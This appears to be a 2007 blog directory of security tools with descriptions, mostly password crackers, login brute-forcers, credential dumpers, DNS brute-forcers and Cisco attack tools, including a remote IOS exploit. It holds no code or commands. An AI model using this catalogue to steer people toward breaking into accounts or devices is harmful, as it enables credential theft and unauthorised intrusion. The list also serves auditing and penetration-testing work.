MODELNET IS A LARGE-SCALE NETWORK EMULATOR THAT ALLOWS USERS TO EVALUATE DISTRIBUTED NETWORKED SYSTEMS IN REALISTIC INTERNET-LIKE ENVIRONMENTS. MODELNET ENABLES THE TESTING OF UNMODIFIED PROTOTYPES RUNNING OVER UNMODIFIED OPERATING SYSTEMS ACROSS VARIOUS NETWORKING SCENARIOS. IN SOME SENSE, IT COMBINES THE REPEATABILITY OF SIMULATION WITH THE REALISM OF LIVE DEPLOYMENT. THE MODELNET USER COMMUNITY HAS DEPLOYED IT TO AID IN THE DESIGN AND TESTING OF NOVEL CONTENT DISTRIBUTION NETWORKS, PEER-TO-PEER SYSTEMS, TRANSPORT-LAYER PROTOCOLS, CONTENT-BASED SWITCHES, DISTRIBUTED STREAM PROCESSORS, DISTRIBUTED FILE SYSTEMS, AND NETWORK MEASUREMENT TOOLS.

USERS DEPLOY MODELNET ON THEIR LOCAL-AREA CLUSTER. EACH INSTANCE OF YOUR APPLICATION RUNS ON A VIRTUAL NODE; MODELNET MULTIPLEXES VIRTUAL NODES ACROSS A SET OF PHYSICAL MACHINES THAT WE CALL EDGE NODES. THE SYSTEM CONFIGURES THE EDGE NODES TO ROUTE THEIR PACKETS THROUGH A MODELNET CORE (CONSISTING OF ONE OR MORE PHYSICAL MACHINES). THIS CORE SUBJECTS EACH PACKET TO THE DELAY, BANDWIDTH, AND LOSS SPECIFIED IN A TARGET TOPOLOGY. MODELNET SUPPORTS HOP-BY-HOP EMULATION, CAPTURING THE EFFECTS OF CROSS TRAFFIC AND CONGESTION WITHIN THE NETWORK.

LANFORGE ICE (COMMERCIAL)

http://www.operativesoft.com/html/lanforgeice.htm

LANFORGE ICE IS A WAN OR NETWORK IMPAIRMENT SIMULATOR.
LANFORGE ICE IS USED TO SIMULATE THE CORE OF A NETWORK, AND IS USED TO TEST AND VERIFY EQUIPMENT THAT COMMUNICATES THROUGH THE CORE. THE LANFORGE ICE PLATFORM IS USED TO SIMULATE T1, DS3, OC-3, OC-12, GIGE, DSL, SATELLITE, DIAL-UP, AND OTHER WIDE AREA NETWORKS (WANS).

GLOMOSIM

http://pcl.cs.ucla.edu/projects/glomosim/

GLOMOSIM IS A SCALABLE SIMULATION ENVIRONMENT FOR WIRELESS AND WIRED NETWORK SYSTEMS. IT IS BEING DESIGNED USING THE PARALLEL DISCRETE-EVENT SIMULATION CAPABILITY PROVIDED BY PARSEC. GLOMOSIM CURRENTLY SUPPORTS PROTOCOLS FOR A PURELY WIRELESS NETWORK. IN THE FUTURE, WE ANTICIPATE ADDING FUNCTIONALITY TO SIMULATE A WIRED AS WELL AS A HYBRID NETWORK WITH BOTH WIRED AND WIRELESS CAPABILITIES.

Cracking Tools

2007-11-22T21:52:00.000-08:00

WEB LINKS TO DICTIONARY WORD LIST FILES

http://www.cotse.com/tools/wordlists.htm
http://packetstormsecurity.org/Crackers/wordlists/

ORACLE DEFAULT PASSWORD AUDITING TOOL

http://www.petefinnigan.com/default/default_password_checker.htm

A SIMPLE COMMAND LINE TOOL THAT CAN BE USED TO CHECK IF ANY DEFAULT USERS ARE INSTALLED IN YOUR DATABASE AND MORE IMPORTANTLY WHETHER THOSE DEFAULT USERS STILL HAVE THEIR DEFAULT PASSWORDS SET TO KNOWN VALUES

ORACLE DEFAULT PASSWORD LIST

http://www.petefinnigan.com/default/default_password_list.htm

THE LIST CAN ALSO BE THOUGHT OF AS A LIST OF ORACLE DEFAULT PASSWORD HASHES.

UNIX RECONNAISSANCE SCRIPTS

http://www.petefinnigan.com/tools.htm

NUMEROUS SCRIPTS THAT DETAIL PRIVILEGE LEVEL, DEFAULT PASSWORD CONFIGURATION, AND SYSTEM ACCESS INFORMATION. ADDITIONAL SCRIPTS FOR FORENSIC DB ANALYSIS ARE ALSO LISTED

CAIN & ABEL

http://www.oxid.it/

CAIN & ABEL IS A PASSWORD RECOVERY TOOL FOR MICROSOFT OPERATING SYSTEMS. IT ALLOWS EASY RECOVERY OF VARIOUS KIND OF PASSWORDS BY SNIFFING THE NETWORK, CRACKING ENCRYPTED PASSWORDS USING DICTIONARY, BRUTE-FORCE AND CRYPTANALYSIS ATTACKS, RECORDING VOIP CONVERSATIONS, DECODING SCRAMBLED PASSWORDS, REVEALING PASSWORD BOXES, UNCOVERING CACHED PASSWORDS AND ANALYZING ROUTING PROTOCOLS. THE PROGRAM DOES NOT EXPLOIT ANY SOFTWARE VULNERABILITIES OR BUGS THAT COULD NOT BE FIXED WITH LITTLE EFFORT. IT COVERS SOME SECURITY ASPECTS/WEAKNESS PRESENT IN PROTOCOL'S STANDARDS, AUTHENTICATION METHODS AND CACHING MECHANISMS; ITS MAIN PURPOSE IS THE SIMPLIFIED RECOVERY OF PASSWORDS AND CREDENTIALS FROM VARIOUS SOURCES, HOWEVER IT ALSO SHIPS SOME "NON STANDARD" UTILITIES FOR MICROSOFT WINDOWS USERS.
CAIN & ABEL HAS BEEN DEVELOPED IN THE HOPE THAT IT WILL BE USEFUL FOR NETWORK ADMINISTRATORS, TEACHERS, SECURITY CONSULTANTS/PROFESSIONALS, FORENSIC STAFF, SECURITY SOFTWARE VENDORS, PROFESSIONAL PENETRATION TESTER AND EVERYONE ELSE THAT PLANS TO USE IT FOR ETHICAL REASONS. THE AUTHOR WILL NOT HELP OR SUPPORT ANY ILLEGAL ACTIVITY DONE WITH THIS PROGRAM. BE WARNED THAT THERE IS THE POSSIBILITY THAT YOU WILL CAUSE DAMAGES AND/OR LOSS OF DATA USING THIS SOFTWARE AND THAT IN NO EVENTS SHALL THE AUTHOR BE LIABLE FOR SUCH DAMAGES OR LOSS OF DATA. PLEASE CAREFULLY READ THE LICENSE AGREEMENT INCLUDED IN THE PROGRAM BEFORE USING IT.

THE LATEST VERSION IS FASTER AND CONTAINS A LOT OF NEW FEATURES LIKE APR (ARP POISON ROUTING) WHICH ENABLES SNIFFING ON SWITCHED LANS AND MAN-IN-THE-MIDDLE ATTACKS. THE SNIFFER IN THIS VERSION CAN ALSO ANALYZE ENCRYPTED PROTOCOLS SUCH AS SSH-1 AND HTTPS, AND CONTAINS FILTERS TO CAPTURE CREDENTIALS FROM A WIDE RANGE OF AUTHENTICATION MECHANISMS. THE NEW VERSION ALSO SHIPS ROUTING PROTOCOLS AUTHENTICATION MONITORS AND ROUTES EXTRACTORS, DICTIONARY AND BRUTE-FORCE CRACKERS FOR ALL COMMON HASHING ALGORITHMS AND FOR SEVERAL SPECIFIC AUTHENTICATIONS, PASSWORD/HASH CALCULATORS, CRYPTANALYSIS ATTACKS, PASSWORD DECODERS AND SOME NOT SO COMMON UTILITIES RELATED TO NETWORK AND SYSTEM SECURITY.

CROWBAR

http://www.sensepost.com/research/crowbar/

GENERIC WEB BRUTE FORCE TOOL

DIGDUG

http://www.edge-security.com/soft.php

THIS LITTLE PROGRAM IS FOR AUDITING A DNS, IT WILL BRUTE FORCE A DOMAIN ASKING FOR HOSTNAMES TAKEN FROM A PREDEFINED LIST. THE LIST HAS THE MOST COMMON NAMES USED FOR HOSTS. IT SUPPORTS HYBRID QUERYS TO FIND A BROADER RANGE OF HOSTS.

CREDDUMP

CREDENTIAL MANAGER PASSWORD DUMPER FOR WINDOWS XP/2003

http://www.oxid.it/creddump.html

CREDDUMP IS A UTILITY THAT DUMPS PASSWORDS FROM WINDOWS XP/2003 USER'S CREDENTIAL FILES AND SHOWS THEM IN THEY'RE CLEARTEXT FORM.

DNSMAP

http://unknown.pentester.googlepages.com

DNSMAP IS A SMALL C BASED TOOL THAT PERFORMS BRUTE-FORCING OF DOMAINS. THE TOOL CAN USE AN INTERNAL WORDLIST, OR WORK WITH AN EXTERNAL DICTIONARY FILE.

LCP

http://www.lcpsoft.com/english/index.htm#lcp

MAIN PURPOSE OF LCP PROGRAM IS USER ACCOUNT PASSWORDS AUDITING AND RECOVERY IN WINDOWS NT/2000/XP/2003.

GENERAL FEATURES OF THIS PRODUCT:

ACCOUNTS INFORMATION IMPORT:
IMPORT FROM LOCAL COMPUTER;
IMPORT FROM REMOTE COMPUTER;
IMPORT FROM SAM FILE;
IMPORT FROM .LC FILE;
IMPORT FROM .LCS FILE;
IMPORT FROM PWDUMP FILE;
IMPORT FROM SNIFF FILE;
PASSWORDS RECOVERY:
DICTIONARY ATTACK;
HYBRID OF DICTIONARY AND BRUTE FORCE ATTACKS;
BRUTE FORCE ATTACK;
BRUTE FORCE SESSION DISTRIBUTION:
SESSIONS DISTRIBUTION;
SESSIONS COMBINING;
HASHES COMPUTING:
LM AND NT HASHES COMPUTING BY PASSWORD;
LM AND NT RESPONSE COMPUTING BY PASSWORD AND SERVER CHALLENGE. SID&USER PROGRAM IS SID AND USER NAMES GETTING TOOL FOR WINDOWS NT/2000/XP/2003. GENERAL FEATURES OF THIS PRODUCT:
SID GETTING FOR A GIVEN ACCOUNT NAME;
GETTING OF AN ACCOUNT NAME FOR SINGLE SID OR ACCOUNT NAMES FOR SID RANGE.

IKECRACK

http://ikecrack.sourceforge.net/

IKECRACK IS AN OPEN SOURCE IKE/IPSEC AUTHENTICATION CRACK TOOL. THIS TOOL IS DESIGNED TO BRUTEFORCE OR DICTIONARY ATTACK THE KEY/PASSWORD USED WITH PRE-SHARED-KEY [PSK] IKE AUTHENTICATION. THE OPEN SOURCE VERSION OF THIS TOOL IS TO DEMONSTRATE PROOF-OF-CONCEPT, AND WILL WORK WITH RFC 2409 BASED AGGRESSIVE MODE PSK AUTHENTICATION.

OPHCRACK

http://ophcrack.sourceforge.net/

THE OPHCRACK LIVECD IS A BOOTABLE LINUX CD-ROM CONTAINING OPHCRACK 2.3 AND A SET OF TABLES (SSTIC04-10K). IT ALLOWS FOR TESTING THE STRENGTH OF PASSWORDS ON A WINDOWS MACHINE WITHOUT HAVING TO INSTALL ANYTHING ON IT. JUST PUT IT INTO THE CD-ROM DRIVE, REBOOT AND IT WILL TRY TO FIND A WINDOWS PARTITION, EXTRACT ITS SAM AND START AUDITING THE PASSWORDS.

SSH EXPECT BRUTE FORCE SCRIPT

http://www.securiteam.com/tools/5QP0L2K60E.html

THIS IS AN EXPECT SCRIPT THAT WILL ALLOW YOU TO SPECIFY A HOST FILE, USER FILE, AND A DICTIONARY. EXTREMELY USEFUL FOR AUDITING LARGE NETWORKS WHERE YOU CAN'T MANUALLY LOG INTO EVERY MACHINE OR DON'T FEEL LIKE RE-RUNNING SOMETHING ON EVERY HOST.

SIMPLE SSH BRUTE FORCE SCRIPT

http://ideacomplex.com/code/ssh-rbrute.rb

SSHATTER

http://www.nth-dimension.org.uk/downloads.php?id=34

SSHATTER IS A PASSWORD BRUTE FORCER FOR SSH, IT IS MULTI THREADED AND CAN AUDIT MORE THAN ONE SYSTEM AND ACCOUNT IN A GIVEN SESSION.

SNMP BRUTE FORCE SCRIPT

http://www.securiteam.com/tools/5EP0N154UC.html

THE FOLLOWING TOOL TRIES TO BRUTE FORCE THE COMMUNITY NAME USED BY THE REMOTE SNMP DEVICE. THIS BRUTE FORCE PROGRAM IS QUITE FAST, AND IS ABLE TO FIND THE COMMUNITY NAME IN A MATTER OF MINUTES.

MEZCAL

http://www.0x90.org/releases/mezcal/index.php

MEZCAL IS AN HTTP/HTTPS BRUTEFORCING TOOL ALLOWING THE CRAFTING OF REQUESTS AND INSERTION OF DYNAMIC VARIABLES ON-THE-FLY.

MEDUSA

http://www.foofus.net/jmk/medusa/medusa.html

MEDUSA IS INTENDED TO BE A SPEEDY, MASSIVELY PARALLEL, MODULAR, LOGIN BRUTE-FORCER. THE GOAL IS TO SUPPORT AS MANY SERVICES WHICH ALLOW REMOTE AUTHENTICATION AS POSSIBLE. THE AUTHOR CONSIDERS FOLLOWING ITEMS AS SOME OF THE KEY FEATURES OF THIS APPLICATION:

THREAD-BASED PARALLEL TESTING. BRUTE-FORCE TESTING CAN BE PERFORMED AGAINST MULTIPLE HOSTS, USERS OR PASSWORDS CONCURRENTLY.
FLEXIBLE USER INPUT. TARGET INFORMATION (HOST/USER/PASSWORD) CAN BE SPECIFIED IN A VARIETY OF WAYS. FOR EXAMPLE, EACH ITEM CAN BE EITHER A SINGLE ENTRY OR A FILE CONTAINING MULTIPLE ENTRIES. ADDITIONALLY, A COMBINATION FILE FORMAT ALLOWS THE USER TO REFINE THEIR TARGET LISTING.
MODULAR DESIGN. EACH SERVICE MODULE EXISTS AS AN INDEPENDENT .MOD FILE. THIS MEANS THAT NO MODIFICATIONS ARE NECESSARY TO THE CORE APPLICATION IN ORDER TO EXTEND THE SUPPORTED LIST OF SERVICES FOR BRUTE-FORCING.

THC-ORACLE SNIFFER/CRACKER

http://www.thc.org/thc-orakel/

THC PRESENTS A CRYPTO PAPER ANALYZING THE DATABASE AUTHENTICATION MECHANSIM USED BY ORACLE. THC FURTHER RELEASES PRACTICAL TOOLS TO SNIFF AND CRACK THE PASSWORD OF AN ORACLE DATABASE WITHIN SECONDS.
ONE OF THE NETWORK AUTHENTICATION MODES USED BY ORACLE DATABASES USES A WEAK KEY EXCHANGE MECHANISM. THIS MECHANISM IS STILL USED ON THE NEWEST DATABASE VERSIONS USING ORACLE'S JAVA DRIVERS. ALSO, FOR NATIVE ORACLE DRIVERS AN ATTACK IS KNOWN TO DOWNGRADE THE AUTHENTICATION MODE TO THE VULNERABLE VERSION. THE ORAKELSNIFFERT ARTICLE DOCUMENTS THE MECHANISM USED BY THE WEAK AUTHENTICATION MODE, THE COMPLEXITY AND IMPACT OF THE ATTACK AND AN EXAMPLE OF AN ATTACK IN THE FIELD. A WINDOWS BASED CRACKER AND A SIMPLE JAVA BASED CLIENT APPLICATION ARE INCLUDED TO VERIFY THE RESULTS. ALSO, A SUPPORTING CRYPTO UTILITY IS RELEASED.

HYDRA

http://www.thc.org/thc-hydra/

THC-HYDRA IS A VERY FAST NETWORK LOGON CRACKER WHICH SUPPORT MANY DIFFERENT SERVICES. CURRENTLY THIS TOOL SUPPORTS: TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, POSTGRES, TEAMSPEAK, CISCO AUTH, CISCO ENABLE, LDAP2, CISCO AAA (INCORPORATED IN TELNET MODULE).

ENABLER.C

http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchtype=archives&counts=76&searchvalue=brute+force+
ENABLER.C ATTEMPTS TO FIND THE ENABLE PASSWORD ON A CISCO SYSTEM VIA BRUTE FORCE. TESTED ON CISCO 2600'S AND 12008'S AND HAS SUPPORT FOR LOGIN-PASS AS WELL AS LOGIN-ONLY DEVICES.

JOHN THE RIPPER

http://www.openwall.com/john/

AN EXTRAORDINARILY POWERFUL, FLEXIBLE, AND FAST MULTI-PLATFORM PASSWORD HASH CRACKER JOHN THE RIPPER IS A FAST PASSWORD CRACKER, CURRENTLY AVAILABLE FOR MANY FLAVORS OF UNIX (11 ARE OFFICIALLY SUPPORTED, NOT COUNTING DIFFERENT ARCHITECTURES), DOS, WIN32, BEOS, AND OPENVMS. ITS PRIMARY PURPOSE IS TO DETECT WEAK UNIX PASSWORDS. IT SUPPORTS SEVERAL CRYPT PASSWORD HASH TYPES WHICH ARE MOST COMMONLY FOUND ON VARIOUS UNIX FLAVORS, AS WELL AS KERBEROS AFS AND WINDOWS NT/2000/XP LM HASHES. SEVERAL OTHER HASH TYPES ARE ADDED WITH CONTRIBUTED PATCHES.

RAINBOW CRACK

http://www.antsight.com/zsl/rainbowcrack/

RAINBOWCRACK IS A GENERAL PROPOSE IMPLEMENTATION OF PHILIPPE OECHSLIN'S FASTER TIME-MEMORY TRADE-OFF TECHNIQUE. IN SHORT, THE RAINBOWCRACK TOOL IS A HASH CRACKER. IT IS TRADITIONAL BRUTE FORCE CRACKER THAT TRYS ALL POSSIBLE PLAINTEXTS ONE BY ONE IN CRACKING TIME. IT IS TIME CONSUMING TO BREAK COMPLEX PASSWORD IN THIS WAY. THE IDEA OF TIME-MEMORY TRADE-OFF IS TO DO ALL CRACKING TIME COMPUTATION IN ADVANCE AND STORE THE RESULT IN FILES SO CALLED "RAINBOW TABLE". IT DOES TAKE A LONG TIME TO PRECOMPUTE THE TABLES. BUT ONCE THE ONE TIME PRECOMPUTATION IS FINISHED, A TIME-MEMORY TRADE-OFF CRACKER CAN BE HUNDREDS OF TIMES FASTER THAN A BRUTE FORCE CRACKER, WITH THE HELP OF PRECOMPUTED TABLES.

FREE RAINBOW TABLES

WEB LINKS TO FREE RAINBOW TABLES:

http://www.freerainbowtables.com/index-rainbowtables-tables.html http://rainbowtables.shmoo.com/
http://wired.s6n.com/files/jathias/
http://hak5.org/wiki/Community_Rainbow_Tables

TFTP-BRUTEFORCER

http://www.arhont.com/ViewPage7422.html?siteNodeId=3&languageId=1&contentId=-1

TFTP-BRUTEFORCER IS A FAST MULTITHREADED TFTP CONFIG FILENAME BRUTEFORCER.

K0LD KNOKING 0N LDAP'S DOOR

http://www.phenoelit.de/kold/

K0LD IS A DICTIONARY ATTACK AGAINST LDAP SERVER. IT QUERIES ALL USER OUT OF THE SERVER FROM A GIVEN DN AND TRIES TO FIND THE PASSWORD.

OBIWAN

http://www.phenoelit.de/obiwan/

THE GOAL OF OBIWAN IS A BRUTE FORCE AUTHENTICATION ATTACK AGAINST WEBSERVER WITH AUTHENTICATION REQUESTS - AND IN FACT TO BREAK IN INSECURE ACCOUNTS.

WINRTGEN

http://www.oxid.it/downloads/winrtgen.zip

WINRTGEN IS A GRAPHICAL RAINBOW TABLES GENERATOR THAT SUPPORTS LM, FASTLM, NTLM, MD2, MD4, MD5, SHA1, RIPEMD160, MYSQL323, MYSQLSHA1, CISCOPIX, SHA-2 (256), SHA-2 (384) AND SHA-2 (512) HASHES.

FTS-WS-DICTOOL

http://ws.hackaholic.org/tools.html

FTS-WS-DICTOOL IS A PROGRAM TO GENERATE OR MANIPULATE SEVERAL KINDS OF WORDLISTS, TO TEST HOW STRONG ARE PASSWORDS, COOKIES, ETC.

FEATURES:

INCREMENTAL BRUTE FORCE (CHARACTERS).
THE CHARACTERS CAN BE DEFINED AS NUMERICAL, ALPHA, ALPHA-NUMERIC, ALPHA-NUMERIC + SYMBOLS.
START AND END NUMBER OF CHARACTERS THAT SHOULD BE USED TO GENERATE THE WORDLIST.
OPEN A WORDLIST AND CONVERT EACH WORD UTILIZING THE "ELITE CONVERSION".
OPEN A WORDLIST AND CONVERT EACH WORD TO: CAPS ON, CAPS OFF, ONLY FIRST CAPS ON, INVERTED WORD.
GENERATE A WORDLIST BASED IN DATE OF BIRTH.
GENERATE A WORDLIST FROM 2 TO 4 INCREMENTAL CHARACTERS FOLLOWED BY BIRTH.
GENERATE A WORDLIST OF DEFAULT PASSWORDS USED BY TERRA PROVIDER (BRAZIL).
OPEN A WORDLIST AND INCREMENT (BEFORE OR AFTER) CHARACTERS ON EACH WORD.
GENERATE A WORDLIST BASED IN PERSONAL DATA.
OPEN A FILE (EX.: E-MAIL, ARTICLE, INFORMATION FROM MSN, ICQ, ETC) AND GENERATE A WORDLIST.

MDCRACK

http://c3rb3r.openwall.net/mdcrack/

MDCRACK IS A FREE, FEATURE FILLED PASSWORD CRACKER DESIGNED TO BRUTEFORCE SEVERAL COMMONLY USED HASH ALGORITHMS AT A VERY AGGRESSIVE SPEED RATE. IT CAN RETRIEVE ANY PASSWORD MADE OF UP TO 8 CHARACTERS (16 FOR PIX ALGORITHMS) AND 55 CHARACTERS WHEN SALTED. IN ORDER TO ACHIEVE THE HIGHEST POSSIBLE SPEED RATE, THIS PROGRAM USES SEVERAL CORES FOR EACH ALGORITHM IT SUPPORTS. EACH ONE OF THESE CORES PROVIDES A DIFFERENT LEVEL OF OPTIMIZATION DESIGNED TO BEST FIT WITH A SPECIFIC SET OF COMMAND LINE OPTIONS. WHATEVER COMMAND LINE CONFIGURATION IS USED, MDCRACK WILL ALWAYS ARRANGE TO USE THE BEST AVAILABLE CORE. TO DATE, THIS PROGRAM SUPPORTS BRUTEFORCE ATTACKS ON MD2, MD4, MD5, NTLMV1 AND PIX (ENABLE AND USERS) HASHES, THE LIST OF ALGORITHMS IS GROWING UP. MULTITHREADING ALLOWS FOR PARALLEL CRACKING AND LOAD SHARING BETWEEN SEVERAL CPUS AND MULTIPLIES OVERALL SPEED BY THE NUMBER OF AVAILABLE PROCESSOR(S).

MD5 AND MD4 COLLISION GENERATORS

http://www.stachliu.com/research_collisions.html

UNHASH

http://www.geocities.com/dxp2532/

UNHASH IS A PROGRAM THAT PERFORMS A BRUTE FORCE ATTACK AGAINST A GIVEN HASH. THE HASH CAN BE MD5 OR SHA1, AND THE PROGRAM WILL AUTO-DETECT WHICH ONE IS GIVEN

IKECRACK

http://ikecrack.sourceforge.net/

TXDNS

http://www.txdns.net/

TXDNS IS A WIN32 AGGRESSIVE MULTITHREADED DNS DIGGER THAT IS CAPABLE OF PLACING ON THE WIRE THOUSANDS OF DNS QUERIES PER MINUTE. TXDNS MAIN GOAL IS TO EXPOSE A DOMAIN NAMESPACE TROUGH A NUMBER OF TECHNIQUES:

TYPOS
TLD ROTATION
DICTIONARY ATTACK
BRUTE FORCE

TXDNS MAY BE USED TO:

FILL THE RECONNAISSANCE GAP LEFT DUE TO DNS SERVERS HARDENING, AS DNS-ZONE TRANSFERS ARE MUCH LIKE TO FAIL.
DIG A GIVEN DOMAIN NAME FOR POSSIBLE PHISHING VARIATIONS BASED ON COMMON WELL-KNOW TYPO ALGORITHMS AND RETURN DNS QUERIES ON BOTH USED AND NOT USED NAMES.
STRESS-TEST DNS SERVERS DUE IS CONFIGURABLE AGGRESSIVE BEHAVIOR. TXDNS PROVIDES SOME COOL OPTIONS, SUCH AS:
PERFORM QUERIES ONLY FOR A GIVEN RESOURCE RECORD TYPE: A, CNAME, HINFO, NS, TXT & SOA
PERFORM NON-RECURSIVE QUERIES
PERFORM QUERIES AGAINST A GIVEN DNS SERVER

YAHOO PASSWORD SHOW

http://www.ourgodfather.com/yahpass/index.htm

THIS PROGRAM REVEALS YAHOO PASSWORDS AND STORES THE PASSWORDS INTO A DIRECTORY THAT YOU CHOOSE AND NAMES THE FILE YAHOO PAS.TXT, HAS A LOT OF COOL FEATURES

WINDOWS MSN LIVE PASSWORD SHOW V7

http://www.ourgodfather.com/ccount/click.php?id=50

THIS PROGRAM REVEALS MSN PASSWORDS, AND STORES THE PASSWORD.

FIREMASTER

http://securityxploded.com/firemaster.php

FIREFOX USES A MASTER PASSWORD TO PROTECT THE STORED SIGN-ON INFORMATION FOR VARIOUS WEBSITES. IF THE MASTER PASSWORD IS FORGOTTEN, THEN THERE IS NO WAY TO RECOVER THE MASTER PASSWORD AND USER HAS TO LOSE ALL THE SIGN-ON INFORMATION STORED IN IT. TO PREVENT THIS PROBLEM, I HAVE DEVELOPED FIREMASTER WHICH USES COMBINATION OF TECHNIQUES SUCH AS DICTIONARY, HYBRID AND BRUTE FORCE TO RECOVER THE MASTER PASSWORD FROM THE FIREFOX KEY DATABASE FILE.

FIREPASSWORD

http://securityxploded.com/firepassword.php

FIREPASSWORD IS THE TOOL DESIGNED TO DECRYPT THE USERNAME AND PASSWORD LIST FROM FIREFOX SIGN-ON DATABASE. FIREFOX STORES THE USERNAME AND PASSWORD INFORMATION FOR VARIOUS WEBSITES IN ITS DATABASE FILES. FIREPASSWORD WORKS ON SIMILAR LINE AS FIREFOX'S BUILT-IN PASSWORD MANAGER BUT IT CAN BE USED AS OFFLINE TOOL TO GET THE USERNAME/PASSWORD INFORMATION WITHOUT RUNNING THE FIREFOX.

VENOM

http://www.cqure.net/wp/?page_id=21

VENOM IS A TOOL TO RUN DICTIONARY PASSWORD ATTACKS AGAINST WINDOWS ACCOUNTS BY USING THE WINDOWS MANAGEMENT INSTRUMENTATION (WMI) SERVICE. THIS CAN BE USEFUL IN THOSE CASES WHERE THE SERVER SERVICE HAS BEEN DISABLED. THE TOOL IS WRITTEN IN VB6 AND MIGHT REQUIRE SOME ADDITIONAL RUNTIME LIBRARIES TO RUN. GUESSING SPEEDS VARY, BUT TEND TO BE AROUND 45-50 GUESSES/SEC. THE PASSWORD FILE SUPPORTS THE FORMATS %USERNAME% AND LC %USERNAME% WITH THE RESULT OF THE USERNAME BEING USED AS THE PASSWORD. THE PREFIX LC CONVERTS THE USERNAME TO LOWERCASE.

SSL KEY/CERT FINDER

http://www.trapkit.de/research/sslkeyfinder/index.html

(POC) EXTRACTING RSA PRIVATE KEYS AND CERTIFICATES OUT OF THE PROCESS MEMORY

VNCPWDUMP

http://www.cqure.net/wp/?page_id=7

VNCPWDUMP CAN BE USED TO DUMP AND DECRYPT THE REGISTRY KEY CONTAINING THE ENCRYPTED VNC PASSWORD IN A FEW DIFFERENT WAYS.

IT SUPPORTS DUMPING AND DECRYPTING THE PASSWORD BY:
- DUMPING THE CURRENT USERS REGISTRY KEY
- RETRIEVING IT FROM A NTUSER.DAT FILE
- DECRYPTING A COMMAND LINE SUPPLIED ENCRYPTED PASSWORD
- INJECTING THE VNC PROCESS AND DUMPING THE OWNERS PASSWORD

IPR (ID PASSWORD RECOVERY)

http://www.cqure.net/wp/?page_id=12

IPR IS A TOOL FOR RECOVERING PASSWORDS ON LOTUS NOTES ID FILES. IT DOES THIS BY GUESSING PASSWORDS YOU SUPPLY IN A DICTIONARY FILE. IT GUESSES APPROXIMATELY 400-500 PASSWORDS A SECOND ON A PIII 1GHZ. THE TOOL SHOULD BE USED BY ADMINISTRATORS FOR FINDING WEAK PASSWORDS IN USER ID FILES.

REQUIREMENTS:

LOTUS NOTES R5 CLIENT (NEEDS TO BE IN THE PATH)

USAGE:

IPR –H

PASSLOC PASSWORD LOCATOR

http://www.imperva.com/downloads/PassLoc.zip

BASED ON ADI SHAMIR'S "PLAYING HIDE AND SEEK WITH ENCRYPTION KEYS" ARTICLE, WHICH SUGGESTS A WAY FOR LOCATING KEYS WITHIN A BUFFER (MEMORY, LARGE FILE, ETC.). THE PASSLOC TOOL ACCEPTS A FILE AS INPUT AND RETURNS A GRAPHICAL PLOT OF ITS CONTENT WHERE THE MOST RANDOM PART OF THE FILE IS COLORED. THE ARTICLE SUGGESTS THAT DUE TO THE RANDOM NATURE OF LONG KEYS PUT IN NON-RANDOM FILES, THE HUMAN EYE CAN EASILY DISTINGUISH THE KEY GIVEN A SUFFICIENTLY LONG FILE.

THE A5 CRACKING PROJECT

http://wiki.thc.org/cracking_a5

WINDOWS XP AND VISTA PRODUCT KEY RECOVERY

http://www.dagondesign.com/articles/windows-xp-product-key-recovery/

CISCO Security Auditing Tools

2007-11-22T21:48:00.000-08:00

PACKETSTORM’S LISTING OF CISCO ANALYSIS TOOLS

http://packetstormsecurity.org/cisco/

BENCHMARK & AUDIT TOOL FOR CISCO IOS ROUTERS AND PIX FIREWALLS

http://www.cisecurity.org/bench_cisco.html

CIS LEVEL-1 / LEVEL-2 BENCHMARKS AND AUDIT TOOL FOR CISCO IOS ROUTERS AND PIX FIREWALLS.

ABILITY TO SCORE CISCO ROUTER IOS.
ABILITY TO SCORE CISCO PIX FIREWALLS.
INCLUDES BENCHMARK DOCUMENTS(PDF) FOR BOTH CISCO IOS AND CISCO PIX SECURITY SETTINGS

CISCO TORCH

http://www.arhont.com/ViewPage7422.html?siteNodeId=3&languageId=1&contentId=-1

CISCO TORCH MASS SCANNING, FINGERPRINTING, AND EXPLOITATION TOOL WAS WRITTEN WHILE WORKING ON THE NEXT EDITION OF THE "HACKING EXPOSED CISCO NETWORKS", SINCE THE TOOLS AVAILABLE ON THE MARKET COULD NOT MEET OUR NEEDS. THE MAIN FEATURE THAT MAKES CISCO-TORCH DIFFERENT FROM SIMILAR TOOLS IS THE EXTENSIVE USE OF FORKING TO LAUNCH MULTIPLE SCANNING PROCESSES ON THE BACKGROUND FOR MAXIMUM SCANNING EFFICIENCY. ALSO, IT USES SEVERAL METHODS OF APPLICATION LAYER FINGERPRINTING SIMULTANEOUSLY, IF NEEDED. WE WANTED SOMETHING FAST TO DISCOVER REMOTE CISCO HOSTS RUNNING TELNET, SSH, WEB, NTP AND SNMP SERVICES AND LAUNCH DICTIONARY ATTACKS AGAINST THE SERVICES DISCOVERED.

EIGRP TOOLS

http://www.arhont.com/ViewPage7422.html?siteNodeId=3&languageId=1&contentId=-1

THIS IS A CUSTOM EIGRP PACKET GENERATOR AND SNIFFER DEVELOPED TO TEST THE SECURITY AND OVERALL OPERATION QUALITY OF THIS BRILLIANT CISCO ROUTING PROTOCOL. USING THIS TOOL REQUIRES A DECENT LEVEL OF KNOWLEDGE OF EIGRP OPERATIONS, PACKETS STRUCTURE AND TYPES, AS WELL AS THE LAYER 3 TOPOLOGY OF AN AUDITED NETWORK.

CISCOPACK

http://www.arhont.com/ViewPage7422.html?siteNodeId=3&languageId=1&contentId=-1

THIS IS THE IOS BINARY IMAGE PACKING AND UNPACKING PROGRAM CAPABLE OF CALCULATING A CORRECT CHECKSUM FOR THESE IMAGES.

PIX CHECKSUM DOS

http://www.arhont.com/ViewPage7422.html?siteNodeId=3&languageId=1&contentId=-1

THIS IS A PROOF OF CONCEPT PROGRAM THAT DEMONSTRATES THE VULNERABILITY OF CISCO PIX DEVICES TO A DENIAL OF SERVICE ATTACK USING A SPOOFED BAD CHECKSUM PACKET.

CPFPC

http://www.oxid.it/cpfpc.html

CISCO PIX FIREWALL PASSWORD CALCULATOR) PRODUCES THE ENCRYPTED FORM OF CISCO PIX ENABLE MODE PASSWORDS WITHOUT THE NEED TO ACCESS THE DEVICE.

ULTIMA RATIO

http://www.phenoelit.de/ultimaratio/index.html

A REMOTE CISCO IOS EXPLOIT

NIPPER

http://sourceforge.net/projects/nipper

